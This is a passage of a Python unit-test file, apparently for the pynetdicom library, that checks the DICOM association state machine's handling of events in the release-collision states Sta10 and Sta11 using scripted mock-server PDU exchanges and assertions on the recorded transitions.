('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt11'
]
def test_evt12(self):
"""Test Sta10 + Evt12."""
# Sta10 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rq), # trigger event
('recv', a_abort), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt12', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt12'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
def test_evt13(self):
"""Test Sta10 + Evt13."""
        # Sta10 + Evt13 -> AR-10 -> Sta12
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-10: Issue A-RELEASE (rp) primitive
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_release_rp), # trigger event
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt13', 'AR-10'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt13'
]
def test_evt14(self):
"""Test Sta10 + Evt14."""
# Sta10 + Evt14 -> <ignore> -> Sta10
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.1)
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt14'
]
def test_evt15(self):
"""Test Sta10 + Evt15."""
# Sta10 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None) # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt15', 'AA-1'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt15'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00'
)
def test_evt16(self):
"""Test Sta10 + Evt16."""
# Sta10 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', a_abort), # trigger event
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt16', 'AA-3'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt16'
]
def test_evt17(self):
"""Test Sta10 + Evt17."""
# Sta10 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt17', 'AA-4'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt17'
]
def test_evt18(self):
"""Test Sta10 + Evt18."""
# Sta10 + Evt18 -> <ignore> -> Sta10
# Evt18: ARTIM timer expired from <local service>
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('wait', 0.2),
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:5] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt18'
]
def test_evt19(self):
"""Test Sta10 + Evt19."""
# Sta10 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('send', a_associate_rq),
('recv', None), # recv a-associate-rq
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('send', b'\x08\x00\x00\x00\x00\x00\x00\x00'), # trigger event
('recv', a_abort), # recv a-abort
]
scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
while not assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(fsm, scp)
scp.shutdown()
assert fsm._transitions[:5] == [
'Sta2', 'Sta3', 'Sta6', 'Sta7', 'Sta10'
]
assert fsm._changes[:6] == [
('Sta1', 'Evt5', 'AE-5'),
('Sta2', 'Evt6', 'AE-6'),
('Sta3', 'Evt7', 'AE-7'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta10', 'Evt19', 'AA-8'),
]
assert fsm._events[:6] == [
'Evt5', 'Evt6', 'Evt7', 'Evt11', 'Evt12', 'Evt19'
]
assert scp.handlers[0].received[2] == (
b'\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00'
)
class TestState11(TestStateBase):
"""Tests for State 11: Release collision req - awaiting A-RELEASE-RP PDU"""
def test_evt01(self):
"""Test Sta11 + Evt1."""
# Sta11 + Evt1 -> <ignore> -> Sta11
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('request'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt1'
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta11 + Evt2."""
# Sta11 + Evt2 -> <ignore> -> Sta11
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta11 + Evt3."""
# Sta11 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_ac),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt3', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt3',
]
def test_evt04(self):
"""Test Sta11 + Evt4."""
# Sta11 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_rj),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt4', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt4',
]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta11 + Evt5."""
# Sta11 + Evt5 -> <ignore> -> Sta11
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta11 + Evt6."""
# Sta11 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_associate_rq),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt6', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt6',
]
def test_evt07(self):
"""Test Sta11 + Evt7."""
# Sta11 + Evt7 -> <ignore> -> Sta11
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('accept'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt7'
]
def test_evt08(self):
"""Test Sta11 + Evt8."""
# Sta11 + Evt8 -> <ignore> -> Sta11
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_associate('reject'))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt8'
]
def test_evt09(self):
"""Test Sta11 + Evt9."""
# Sta11 + Evt9 -> <ignore> -> Sta11
# Evt9: Receive P-DATA primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_pdata())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt9'
]
def test_evt10(self):
"""Test Sta11 + Evt10."""
# Sta11 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', p_data_tf),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt10', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt10',
]
def test_evt11(self):
"""Test Sta11 + Evt11."""
# Sta11 + Evt11 -> <ignore> -> Sta11
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt11'
]
def test_evt12(self):
"""Test Sta11 + Evt12."""
# Sta11 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.1),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt12', 'AA-8'),
]
assert self.fsm._transitions[:6] == [
            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt12',
]
def test_evt13(self):
"""Test Sta11 + Evt13."""
# Sta11 + Evt13 -> AR-3 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-3: Issue A-RELEASE (rp) primitive and close connection
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('send', a_release_rp),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:7] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
('Sta11', 'Evt13', 'AR-3'),
]
assert self.fsm._transitions[:6] == [
            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt13',
]
def test_evt14(self):
"""Test Sta11 + Evt14."""
# Sta11 + Evt14 -> <ignore> -> Sta11
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
('recv', None),
('send', a_associate_ac),
('recv', None),
('send', a_release_rq),
('recv', None),
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
            'Sta4', 'Sta5', 'Sta6', 'Sta7', 'Sta9', 'Sta11'
]
assert self.fsm._events[:7] == [
'Evt1', 'Evt2', 'Evt3', 'Evt11', 'Evt12', 'Evt14', 'Evt14'
]
def test_evt15(self):
"""Test Sta11 + Evt15."""
# Sta11 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
('recv', None), # recv a-associate-rq
('send', a_associate_ac),
('recv', None), # recv a-release-rq
('send', a_release_rq), # collide
('recv', None), # recv a-release-rp
('recv', None), # recv a-abort
('wait', 0.2),
]
scp = self.start_server(commands)
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
self.assoc.acse.is_release_requested = is_release_requested
self.assoc.start()
while not self.assoc.is_established:
time.sleep(0.05)
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(False))
time.sleep(0.2)
self.assoc.dul.send_pdu(self.get_release(True))
time.sleep(0.1)
self.assoc.dul.send_pdu(self.get_abort())
time.sleep(0.1)
#self.print_fsm_scp(self.fsm, scp)
scp.shutdown()
assert self.fsm._changes[:6] == [
('Sta1', 'Evt1', 'AE-1'),
('Sta4', 'Evt2', 'AE-2'),
('Sta5', 'Evt3', 'AE-3'),
('Sta6', 'Evt11', 'AR-1'),
('Sta7', 'Evt12', 'AR-8'),
('Sta9', 'Evt14', 'AR-9'),
]
assert self.fsm._transitions[:6] == [
